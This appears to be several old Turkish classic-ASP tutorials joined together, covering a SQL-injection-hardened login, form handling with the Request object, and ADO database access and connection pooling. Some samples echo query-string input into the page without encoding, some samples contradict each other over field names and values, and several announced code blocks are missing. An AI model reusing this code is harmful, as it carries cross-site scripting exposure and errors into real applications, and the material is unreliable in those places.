Yukarıda makalenin ilk başında bahsettiğim 5 temel prensibin hepsi bu login işleminde uygulandı. TextBox nesnelerine girilebilecek max karakter sayısının kısıtlanması ile çalışabileck Sql deyimleri girilemez. Aynı şekilde RegularExpressionValidator ifadeleri ile özel karakterlerin girilmesi önlenlenmiş oldu. Yine ConnectionString ifademizde benim yarattığım bir kullanıcı ile bağlanılıyor. Bu kullanıcıya sadece StoredProcedure’leri çalıştırılmasına izin veriliyor. Böylece başka herhangi bir sql komutunun çalışmasına olanak tanınmıyor. Çünkü veritabanına bağlanan kullanıcının yapabildikleri kısıtlanmıştır. SqlCommandType’in özelliği Stored Procedure olarak ayarlanmış ve böylece dinamik SQL ifadelerinin kullanılması engellenmiş olur. Stored Procedure’e aktarılan parametrelerde şifrelenerek veritabanında, şifrelenmiş olarak duran kayıtlarla karşılaştırlır.

Elbette web uygulamasının içerisinde, login sayfasından farklı sayfalarda yer alan TextBox nesneleri ile kötü niyetli kullanıcılar veritabanımıza dolayısıyla web uygulamamıza zarar verebilirler. Örneğin, herkesin bildiği site içerisinde arama yapabilmemizi sağlayan TextBox nesnelerine girilen değerlerde kontrol edilmelidir.

Bu makalenin içerisinde yer alan kodları daha iyi anlayabilmek için, makale içinde geçen bazı konuları (FormsAuthentication, Verileri Şifreleme, RegularExpressionValidator, Stored Procedure) yine aspnedir.com sitesinden okumanızı tavsiye ederim.

ASP Request nesnesini kullanarak, HTML formlarıyla birleştirilmiş verileri toplamak ve işletmek için, basit ama güçlü betikler oluşturabilirsiniz. Bu başlık altında, sadece temel form işletim betiklerini öğrenmekle kalmayacak, aynı zamanda, hem Web sunucunuz hem de kullanıcı tarayıcısı üzerinde form bilgisi onaylamak için yararlı teknikleri de öğrenmiş olacaksınız.

HTML Formları Hakkında

HTML formları, Web bilgilerini toparlamanın en iyi metodu budur, özel HTML etiketlerinin (ki bunlar Web sayfası üzerindeki arayüz kontrollerini sağlar) düzenlemesidir. Metin kutuları, düğmeler, ve onay kutuları kullanıcının bir Web sayfasıyla iletişimini ve Web sunucuya bilgi onayı sağlayan kontrollere örneklerdir.

Aşağıdaki HTML örneği kullanıcının adı, soyadı ve yaşı bilgilerini girmesini ve Web sunucuya bu bilgilerin onaylanmasını sağlayan bir de düğmesi bulunan bir formu oluşturur. Form ayrıca Web sunucuya ek bilgiler iletebilen bir saklı kontrol de içerir.

<FORM METHOD=”POST” ACTION=”dosyam.asp”>
<INPUT TYPE=”text” NAME=”adi”>
<INPUT TYPE=”text” NAME=”soyadi”>
<INPUT TYPE=”text” NAME=”yasi”>
<INPUT TYPE=”hidden” NAME=”userstatus” VALUE= “new”>
<INPUT TYPE=”submit” VALUE=”Enter”>
</FORM>

ASP ile Form Girişlerini Ele Almak
Bir form Web sunucuya bilgi onaylayınca, kullanıcı tarayıcısı HTML <FORM > etiketinin ACTION özelliği ile belirtilen .asp dosyasını ister. .asp dosyası form değer işletimini ele alan betikler içerir. Sonuçlar tablosu görüntülemek ya da veri tabanından veri sorgulamak gibi…

HTML form değerlerini biriktirmek için .asp dosyaları kullanmanın üç yolu vardır:

· Bir .asp dosyası bilgileri başka bir .asp dosyasına ileten bir form oluşturabilir.
· Bir statik .htm dosyası değerlerini .asp dosyasına ileten bir form içerebilir.
· Bir .asp dosyası bilgileri kendine iletebilir.
İlk iki metod diğer giriş programlarıyla çalışan formlarla aynı şekilde çalışır. Fakat Asp ile kullanıcı seçimlerini okuyan ve cevaplayan komutlar da kullanabilirsiniz.

Bilgiyi kendine yollayan bir form tanımı içeren .asp dosyası oluşturmak daha karmaşık ama daha güçlü bir formlarla çalışma yoludur. Bu işlem “Form Girişi Onaylamak” kısmında anlatılmaktadır.

Form Girişi
ASP Request nesnesi iki yığın sağlar ki bunlar bir URL istemine eklenmiş form bilgilerini yeniden elde etme işini basitleştirir.

“QueryString” Yığını
QueryString yığını Web sunucunuza iletilen form değerlerini, istem URLsinde soru işareti ile biten bir metin olarak getirir. Form değerleri istem URLsine ya HTTP GET metodu ile ya da elle form değerlerini URLye ekleyerek ilave edilebilir.

Örneğin, bir önceki form örneğinde GET metodu (ACTION = “GET”) kullanılsa ve kullanıcı Jeff, Smith, ve 30 yazmış olsaydı, aşağıdaki URL istemi sunucuya yollanmış olurdu:

http://scripts/Myfile.asp?adi=Jeff&soyadi=Smith&yasi=30&userstatus=new

Myfile.asp aşağıdaki form işletim betiğini içerebilir:

Merhaba, <%= Request.QueryString(”adi”) %> <%= Request.QueryString(”soyadi”) %>.
Siz <%= Request.QueryString(”yasi”) %> yasindasiniz.
<%
If Request.QueryString(”userstatus”) = “new user” then
Response.Write”Bu Web sitesine ilk gelişiniz!”
End if
%>

Bu durumda, Web sunucunuz kullanıcı Web tarayıcısına aşağıdaki metini döndürür:

Merhaba, Jeff Smith. Siz 30 yasindasiniz. Bu Web sitesine ilk gelişiniz!

QueryString yığınının aynı zamanda bir de istem gövdesinde yer alabilen çoklu değerlerden birine erişmek için kullanılacak seçimlik bir parametresi vardır. Ayrıca Count özelliğini de belli bir türün kullanılma sayısını saymak için kullanabilirsiniz.

Örneğin, birçok maddesi bulunan bir liste kutusunu içeren bir form, aşağıdaki istemi oluşturur:

http://list.asp?yiyecek=elma&yiyecek=zeytin&yiyecek=ekmek

Ayrıca, çoklu değerleri saymak için aşağıdaki komutu da kullanabilirsiniz:

Request.QueryString(”yiyecek”).Count

Çoklu değer türlerini görüntülemek için, List.asp aşağıdaki betiği içerir:

<%Total = Request.QueryString(”yiyecek”).Count%>
<%For i = 1 to Total%>
<%= Request.QueryString(”yiyecek”)(i) %>
<%Next%>

Yukarıdaki betik görüntüsü:
apples
olives
bread

Form Yığını
HTTP GET metodunu Web sunucuya karışık ve uzun form değerlerini ileteceğiniz zaman, bilgiyi kaybetme riskiniz vardır. Çoğu Web sunucular URL sorgu dizgisi boyunu kısıtlamaya eğilimlidir. Bu yüzden, uzun form değerlerinin kısaltılması için GET metodu kullanılır. Eğer bir formdan bir Web sunucuya büyük miktarda bir bilgi gönderecekseniz, HTTP POST metodunu kullanmalısınız. HTTP istem gövdesinde form verisi gönderen POST metodu, sunucuya sınırsız sayıda karakteri sanal olarak yollar. ASP Request nesnesinin Form yığınını POST metodu ile yollanmış değerleri elde etmek için kullanabilirsiniz.

Form yığını, değerleri QueryString yığını ile aynı mantıkla saklar. Örneğin, eğer bir kullanıcı uzun bir liste halinde isimler girerek bir formu doldurduysa, isimleri aşağıdaki betik ile elde edebilirsiniz:

<% For i = 1 to Request.Form.Count %>
<% =Request.Form(”isimler”)(i) %>
<% Next %>

Form Girişi Onaylamak
İyi bir işletim betiği, verileri işlemeden önce girilen bilgiyi onaylar. Onaylama betiği, kullanıcının forma girdiği bilgilerin doğru türlerde olup olmadığını kontrol eder. Örneğin, eğer Web siteniz kullanıcıya finansal bilgileri hesaplama imkanı veren bir form içeriyorsa, sonuçların işletimden önce kullanıcının metin değil sayısal değerler girdiğini onaylanmasını isteyebilirsiniz.

Form girişini onaylamanın iyi bir yolu da bilgiyi kendine veren bir form yaratmaktır. Bu durumda, .asp dosyası bilgiyi getiren formu içerir. Örneğin, aşağıdaki betik, bilgiyi kendine yollayarak, “yaş” alanına sayı girilip girilmediğini saptar:

<% If Isnumeric(Request.QueryString(”yasi”)) then %>
<p>Merhaba,yaşınız <%=Request.QueryString(”age”)%>
<%Else %>
<p>Lütfen sayısal bir değer giriniz.
<%End If %>

<FORM METHOD= “POST” ACTION=”verify.asp” >
Name: <INPUT TYPE=”text” NAME=”adi” >
Age: <INPUT TYPE=”text” NAME=”yasi” >
<INPUT TYPE=”submit” VALUE=”Enter”>
</FORM>

Bu örnekte, betik Verify.asp isimli bir dosyanın, formu içeren aynı dosya, içindedir. Form bilgiyi kendine ACTION özelliğinde Verify.asp’yi belirterek yollar.

Ayrıca, kullanıcının uygun bilgiler girdiğini kontrol etmek için istemci-taraflı betikler de oluşturabilirsiniz. Form giriş hatalarını kullanıcılara daha hızlı bildirmek için form girişini kullanıcı Web tarayıcısında onaylamak, Web sunucunuzun ağ trafiğini azaltacaktır. Aşağıdaki betik, kullanıcı Web tarayıcısı üzerinde çalışır ve bilgiyi Web sunucunuza bildirmeden önce kullanıcı bilgilerini onaylar.

<SCRIPT LANGUAGE=”VBScript”>
<!–
Sub btnEnter_OnClick
Dim Form
Set Form = Document.MyForm
If IsNumeric(Form.yasi.Value) Then
Form.submit
Else
Msgbox “Lütfen sayısal bir değer giriniz.”
End if
End Sub
//–>
</SCRIPT>

<FORM METHOD= “POST” NAME= Formum ACTION=”dosyam.asp” >
adi: <INPUT TYPE=”text” NAME=”adi” >
yasi: <INPUT TYPE=”text” NAME=”yasi” >
<INPUT TYPE=”button” NAME=”btnEnter” VALUE=”Enter”>
</FORM>

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin

ActiveX Data Objects (ADO), Web sayfalarınızda veri tabanı erişimini sağlamada kullanılan kolay kullanılır bir teknolojidir. ADO’yu Open Database Connectivity (ODBC) veri tabanına ve OLE DB veri kaynaklarına bağlantı kurmak için özlü ve ölçümsel betikler yazmak için kullanılabilir.

ODBC’de DSN (Data Source Name_Veri Kaynağı İsmi) Oluşturmak

Veri tabanı betiklerini tanımlamadan önce, ADO’yu yerleştirmeli, tanımlamalı ve veri tabanınızla iletişimini sağlamalısınız. Web uygulamanızdan veri tabanına veri ileten veri tabanı sürücüleri, ODBC veri tabanını yerleştirmek ve tanımlamak için bir DSN kullanırlar. Tipik olarak, DSN, veri tabanı konfigürasyonunu, kullanıcı güvenliğini, ve konum bilgisini içerir ve Windows NT kayıtlarında bir kayıt ya da metin biçimini alabilirler.

ODBC ile oluşturmak istediğiniz DSN türünü seçebilirsiniz: User, System, ya da File. User ve System DSNleri Windows NT kayıtlarında yer alır. System DSN, sunucuya giren her kullanıcının veri tabanına erişmesine izin verir. Oysa User DSN veri tabanı erişiminde, belirli güvenlik kriterlerine göre belirli kullanıcılara izin verir. File DSN, metin biçimini alır, çoklu kullanıcı erişimine izin verir ve bir sunucudan diğerine geçirilmesi, DSN’i kopyalayarak, kolaydır. Bu sebeple, bu konudaki örneklerde File DSN kullanılmaktadır.

Dosya tabanlı bir DSN’i oluşturmak için Windows Başlat menüsünden Denetim Masasını açın. ODBC ikonuna çift tıklayın, ve File DSN özelliğini seçin. Adde tıklayın, veri tabanı sürücünüzü seçin, ve Nexte tıklayın. Özel veri tabanı yazılımınız için bir DSN konfigüre etmek için aşağıdaki adımları takip edin.

1. Create New Data Source diyalog kutusunda, liste kutusundan Microsoft Access Driver’ı seçin ve Nexte tıklayın.

2. DSN dosyanız için bir isim yazın ve Nexte tıklayın..

3. Veri kaynağını oluşturmak için Finishe tıklayın.

4. ODBC Microsoft Access 97 Setup diyalog kutusunda Selecte tıklayın. Bir Microsoft Access veri tabanı ismi (*.mdb) seçin, ve OKe tıklayın.

ASP, uygun veri kaynakları olarak, paylaşılan veri tabanlarını (Microsoft ® Access ya da Microsoft ® FoxPro) destekler. Paylaşılan dosyalı veri tabanlarının tavsiye edilmesine rağmen bu tür veri tabanı motorlarını sadece geliştirme amaçlı kullanınız. Paylaşımlı dosyalı veri tabanları, yüksek istemler için sunucu-istemci veri tabanları kadar uygun olmayabilir.

Bir SQL Server Database File(Sunucu veri tabanı dosyası) DSN’i tanımlamak için:

Not: Eğer veri tabanı uzak bir sunucuda yeralıyorsa, detaylı konfigürasyon bilgileri için sunucu yöneticinize başvurunuz. Aşağıdaki adımlar SQL sunucusu için varsayılan ODBC ayarlarını kullanır. Bu ayarlar sizin donanımınızda çalışmayabilir.

1. Create New Data Source diyalog kutusunda, liste kutusundan SQL Server’ı seçin ve Nexte tıklayın.

2. DSN dosyası isminizi yazın ve Nexte tıklayın.

3. Veri kaynağını oluşturmak için Finishe tıklayın.

4. SQL sunucu adını, giriş kimliğinizi ve şifrenizi girin.

5. Create a New Data Source to SQL Server diyalog kutusunda, Server liste kutusundaki SQL sunucu veri tabanını içeren sunucunun adını seçin ve Nexte tıklayın.

6. Giriş numarası güvenliği için bir metod seçin.

7. Eğer SQL Sunucu güveliğini seçtiyseniz, bir giriş kimliği ve şifre girin, Nexte tıklayın.

8. Create a New Data Source to SQL Server diyalog kutusunda, varsayılan veri tabanınızı, sürücü saklama yordam ayarlarını, ve ANSI tanımlarını kurun ve Nexte tıklayın.

9. Diyalog kutusundan (Create a New Data Source to SQL Server), bir karakter çevrim metodu seçin, ve Nexte tıklayın.

10. Bir sonraki diyalog kutusundan (Create a New Data Source to SQL Server), giriş opsiyonlarını seçin.

11. ODBC Microsoft SQL Server Setup diyalog kutusundan, Test Data Sourcea tıklayın. Eğer DSN doğru olarak oluşturulmuşsa, Test Results diyalog kutusu testin doğru olarak tamamlandığını belirtecektir.

Bir Oracle Database File DSN’i konfigüre etmek için:

DSN’i yaratmak istediğiniz bilgisayarda Oracle istemci yazılımının doğru olarak kurulduğuna emin olun.

1. Create New Data Source diyalog kutusunda, liste kutusundan Microsoft ODBC for Oracle’ı seçin ve Nexte tıklayın.

2. DSN dosya isminizi yazın ve Nexte tıklayın.

3. Veri kaynağını yaratmak için Finishe tıklayın

4. Bir kullanıcı adı, şifre ve sunucu ismi girip, OKe tıklayın.

Not: DSN dosyalarının .dsn uzantıları vardır ve \Programs\Common Files\ODBC\Data Sources dizininde yer alırlar.

Bir Veri Tabanına Bağlanmak

İlk adım veri tabanı kaynağı ile bir bağlantı kurmaktır. Uygulamalarınız ve ODBC veri tabanları arasında bağlantı kurmak için ADO’nun Connection nesnesini kullanabilirsiniz. Connection nesnesi veri tabanı bağlantısı kurma, koparma ve günleme için sorgu yapmada kullanılan birçok özellik ve metodu içerir.

Bir veri tabanı bağlantısı kurmak için öncelikle bir Connection nesnesi oluşturun.

Örneğin, aşağıdaki betik Connection nesnesini oluşturur ve bir bağlantı kurar:

Connection Nesnesi ile Sorgu İşlemek

Connection nesnesinin Execute metodu ile, Structured Query Language (SQL) sorgularınızı veri tabanı kaynağına iletip sonuçları elde edebilirsiniz. Aşağıdaki betik Connection nesnesinin Execute metodunu kullanarak SQL INSERT komutu formundaki bir sorguyu iletir. Bu durumda, betik bloğu Jose Lugo ismini Musteriler isimli veri tabanı tablosuna ekliyor.

SQL INSERT komutunun yanısıra, SQL UPDATE ve DELETE komutları da kullanılabilir.

Sonuçları İşlemek için Recordset Nesnesini Kullanmak

Connection nesnesinin birtakım sınırlamaları vardır. Özellikle Connection nesnesiyle veri tabanından veri getiren ve görüntüleyen betikler yazamazsınız. Veri getirmek, sonuçları incelemek ve veri tabanınız üzerinde değişiklikler yapmak için, ADO’da Recordset nesnesi vardır. Recordset nesnesinin veri getirmek ve birtakım veri tabanı satır veya kayıtlarını görüntülemek gibi özellikleri vardır. Recordset nesnesi sorgu sonucu dönen her kayıtın pozisyonunu tuttuğu için, sonuçlar üzerinde gezebilme imkanınız vardır.

Recordset nesnenizin cursor türü özelliğine göre kayıtlar üzerinde gezip, günleme yapabilirsiniz. Veri tabanı imleçleri göstergeler gibi davranarak, kayıt grubu içinde belli bir yere konumlanabilir. İmleçler, özellikle, kayıtları getirme ve incelem için kullanışlıdır.

Recordset nesnesinin imleç hareketlerini kontrol etme, dolayısıyla sonuçları inceleme ve günleme özelliği vardır. Örneğin, CursorType ve CursorLocation özelliklerini, istemci uygulamanıza sonuçlar döndüren imleç türlerini konfigüre etme ve diğer kullanıcıların veri tabanına yaptığı en son değişiklikleri görmek için kullanabilirsiniz.

Record Set (kayıt grubu) Getirmek

Başarılı veri tabanı uygulamaları, bağlantı kurmak için Connection nesnesini ve dönen veriyi işlemek için Recordset nesnesini kullanır. Örneğin, aşağıdaki sunucu-taraflı betik bir SQL SELECT komutunu çalıştırmak için Recordset nesnesini kullanır. SELECT komutu sorgu kriterlerine göre belli bir grup bilgi getirir. Sorgu ayrıca SQL WHERE ifadesini de içerir ki bu ifade sorguyu belirli kriterlere göre kısıtlamayı sağlar. Bu örnekte, WHERE ifadesi sorguyu Musteriler veri tabanı tablosundaki soyadı Smith olanlarla sınırlıyor.

Yukarıdaki örnekte, Connection nesnesi veri tabanı bağlantısını kurdu ve Recordset nesnesi de aynı bağlantıyı sonuçları veri tabanından getirmek için kullandı. Bu metod, veri tabanı bağlantısı kurulduğunda hassas konfigürasyonlar yapılacağı zaman avantajlı olur.

Örneğin, bağlantı kopmadan önceki gecikme zamanını belirlemeniz gerekiyorsa, bu özelliği ayarlamak için Connection nesnesini kullanmanız gerekecektir. Ancak, sadece ADO’nun varsayılan bağlantı özellikleri ile bir bağlantı kurmak istiyorsanız, Recordset nesnesinin Open metodu ile bir bağlantı kurabilirsiniz:

Recordset nesnesinin Open metodu ile bağlantı kuruyorsanız, dolayısıyla bağlantı güvenliğini de Connection nesnesi ile sağlıyorsunuz demektir.

Command Nesnesi ile Sorgu Geliştirmek

ADO Command nesnesi ile sorguları, Connection ve Recordset nesnelerinin kullanıldığı yolla çalıştırabilirsiniz. Fakat Command nesnesi ile sorgunuzu veri tabanı kaynağında hazırlayıp ya da derleyip, sorguyu değişik değerlerle de yeniden kullanabilirsiniz. Sorguyu derlemenin faydası, hazırda bulunan bir sorguyu değiştirmek için gerekli sürenin önemli ölçüde azaltılmasıdır. Ayrıca, SQL sorgularınızı, işletimden önce sorgu değiştirme opsiyonu sayesinde, kısmen tanımsız bırakabilirsiniz.

Command nesnesinin Parameters yığını, sorguyu her yeniden kullanışınızda yeniden oluşturma sorununu ortadan kaldırır. Örneğin, Web tabanlı envanter uygulamanızda, malzeme ve fiyat bilgilerini düzenli olarak günlemeniz gerekiyorsa, sorgunuzu aşağıda gösterilen şekilde yeniden tanımlayabilirsiniz:

Yukardaki örneği inceleyecek olursak, sorgu veri tabanı kaynağına tekrar yollanmadan ve tekrar tanımlanmadan, sorgu, değişik değerlerle yeniden kullanılıyor. Sorgularınızı Command nensnesi ile derlemenin bir avantajı da, SQL sorgularını oluşturen dizgileri birleştirirken yaşanabilecek problemleri önlemesidir. Command nesnesinin Parameter yığınını kullanarak, belli dizgi, tarih ve saat türleri tanımlamada yaşanabilecek problemeler kısmen ortadan kalkmış olur. Örneğin, kesme işareti (’) içeren SQL sorgu değerleri, sorgunun çalışmamasına sebep olabilir:

strSQL = “INSERT INTO Musteriler (adi,soyadi) VALUES (’Robert’,'O’Hara’)”

Soyadi O’Hara içinde kesme işareti var ve bu işaret SQL VALUES anahtar kelimesinde verileri belirten kesme işareti ile karışabilir. Command nesnesi kullanınca bu tür problemeler ortadan kalkar.

HTML Formlarını ve Veri Tabanı Erişimini Birleştirmek

HTML formları içeren Web sayfaları, kullanıcılara uzaktan veri tabanına erişip belli bilgilerin getirilmesine olanak verir. ADO ile kullanıcı form bilgilerini biriktiren, bazı veri tabanı sorguları yapabilen ve kullanıcıya bilgi döndürebilen basit betikler yazılabilir. ASP Request nesnesini kullanarak, HTML formuna girilen bilgileri getirebilir, bu bilgiyi SQL ifadelerinize katabilirsiniz. Örneğin, aşağıdaki betik bloğu HTML formundan elde edilmiş bilgileri veri tabanı tablosuna ekler. Betik kullanıcı bilgilerini, Request nesnesinin Form yığını ile biriktirir.

Formlar ve ASP Request nesnesi hakkında daha fazla bilgi için, “HTML Formlarıyla Çalışmak”a bakınız.

Veri Tabanı Bağlantısı Başarımı

Binlerce müşterinin çevrimiçi girişlerini takip etme gibi bir Web veri tabanı uygulamasında asıl önemli olan veri tabanı bağlantısı başarımıdır. Veri tabanı bağlantısını açmak ve kullanmak, hiç bilgi iletimi olmasa bile, veri tabanı kaynaklarını zorlayıp, bağlantı problemlerini yol açabilir. İyi tasarlanmış bir Web veri tabanı uygulaması, veri tabanı bağlantısını geri elde edip, ağ trafiği yüzünden oluşan gecikmeleri telafi edebilmelidir.

Bağlantının Zaman Aşımı

Bir veri tabanı sunucusu işletim sırasında aniden fazla yüklenmiş olabilir. Böylece yeniden giriş yapılması hatta bağlantının da yeniden kurulması gerekir. Sonuç olarak, aşırı miktarda oluşan bağlantı gecikmeleri uygulamanızın performansını düşürecektir.

Connection nesnesinin ConnectionTimeout’u, yeniden bağlantı kurma çabaları ve hata mesajları için harcanan zamanı sınırlar. Örneğin, aşağıdaki betik ConnectionTimeout özelliğini bağlantı kurma denemesini yirmi saniye bekledikten sonra iptal edecek şekilde ayarlamaktadır:

Set cn = Server.CreateObject(”ADODB.Connection”)

cn.ConnectionTimeout = 20

cn.Open “FILEDSN=MyDatabase.dsn”

ConnectionTimeout özelliğinin varsayılan değeri 30 saniyedir.

Bağlantıları Havuzlama

Sık sık bağlantı kurup, kesen Web veri tabanı uygulamaları, veri tabanı sunucusunun performansını düşürür. ASP, ODBC 3.5 kullanarak, bağlantı başarımını verimli bir şekilde destekler. Connection biriktirmek, performansı yükseltmek ve boş bağlantı sayısını azaltmak için, açık veri tabanı bağlantılarını korur ve değişik kullanıcılar arasında bağlantı paylaşımını sağlar. Her bağlantı isteminde, bağlantı havuzu öncelikle havuzda boş bağlantı olup olmadığını kontrol eder. Varsa, yeni bağlantı yerine bu bağlantı döndürülür.

Eğer ODBC sürücünüzün bağlantı havuzuna katılmasını istiyorsanız, veri tabanı sürücünüzü konfigüre etmeli ve sürücünün CPTimeout özelliğini Windows NT kayıtlarında ayarlamalısınız. ODBC bir bağlantıyı kesmek isterse, bağlantı koparılmak yerine havuzda saklanır. CPTimeout özelliği, bağlantının havuzda ne kadar süre tutulabileceğini belirler.

Eğer bağlantı CPTimeout’da belirlenenden daha uzun durmak isterse, bağlantı koparılır ve havuzdan çıkarılır.

Aşağıdaki ayarlarla bir Windows kaydı yaratarak,CPTimeout özelliğine sırayla değer atamak suretiyle bir ODBC veri tabanı sürücüsü için bağlantı havuzlama yapabilirsiniz:

\HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI\driver-name\CPTimeout = timeout

(REG_SZ, birimler saniye cinsinden )

Örneğin, aşağıdaki anahtar, SQL sunucu sürücüsü için, bağlantı havuzu zaman aşımını 180 saniyeye kurar.

\HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI\SQL Server\CPTimeout = 180

Not: Varsayılmış olarak, Web sunucunuz CPTimeout değerini 60 saniye olarak kurar.

Bağlantıyı Birçok Sayfa Arasında Kullanmak

Bağlantıyı bir çok sayfa arasında, ASP’nin Application nesnesi içinde bağlantıyı saklamak suretiyle yeniden kullanabilirsiniz. Ancak bu durumda, bir bağlantıyı gerekmediği halde boşuna açık tutmuş olursunuz. Eğer aynı ASP veri tabanı uygulmasına birden fazla kullanıcı erişmek istiyorsa, bu durumd ASP’nin Application nesnesinin içine bağlantı dizgisini yerleştirerek, çeşitli Web sayfaları arası veri tabanı bağlantısını yeniden kullanabilirsiniz. Örneğin, bağlantı dizgisini Global.asa dosyasını Application_OnStart olay yordamında belirleyebilirsiniz. Aşağıdaki betikte bu durum örneklenmektedir:

Application.lock

Application(”ConnectionString”) = “FILEDSN=Veritabanım.dsn”

Application.unlock

Artık veri tabanına erişen her ASP dosyasında, sayfada bağlantı nesnesi örneği oluşturmak için, şöyle yazabilirsiniz:

<OBJECT RUNAT=Server ID=cn PROGID=”ADODB.Connection”>

</OBJECT>

Bağlantıyı açmak için şu betiği kullanın:

cn.Open Application(”ConnectionString”)

Ve sayfanın sonunda bağlantıyı koparmak için:

cn.Close

Tek bir kullanıcını birçok Web sayfası arasındaki bağlantıyı yeniden kullanmak istemesi durumunda, bağlantı dizgesini saklamak için Application nesnesi yerine Session nesnesini kullanmak daha avantajlıdır.

Bağlantıyı Koparmak

Bağlantı havuzlamayı en iyi şekilde kullanmak için, veri tabanı bağlantısını olabildiğince çabuk bir şekilde kapatın. Varsayılmış olarak, betiğinizin çalışması bitince bağlantı da kesilir. Ancak, ihtiyaç bitince bağlantınızı kapatırsanız, veri tabanı sunucusunun iş yükünü azaltmış ve bağlantıyı diğer kullanıcıların kullanımına bırakmış olursunuz.

Connection nesnesinin Close metodunu kullanarak, Connection nesnesinin veri tabanı ile olan bağlantısını kesmiş olursunuz. Aşağıdaki betik, bir bağlantıyı açar ve kapar:

<% strDSN = “FILEDSN=VeriTabanım.dsn”

Set cn = Server.CreateObject(”ADODB.Connection”)

cn.Open

cn.Close

%>

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin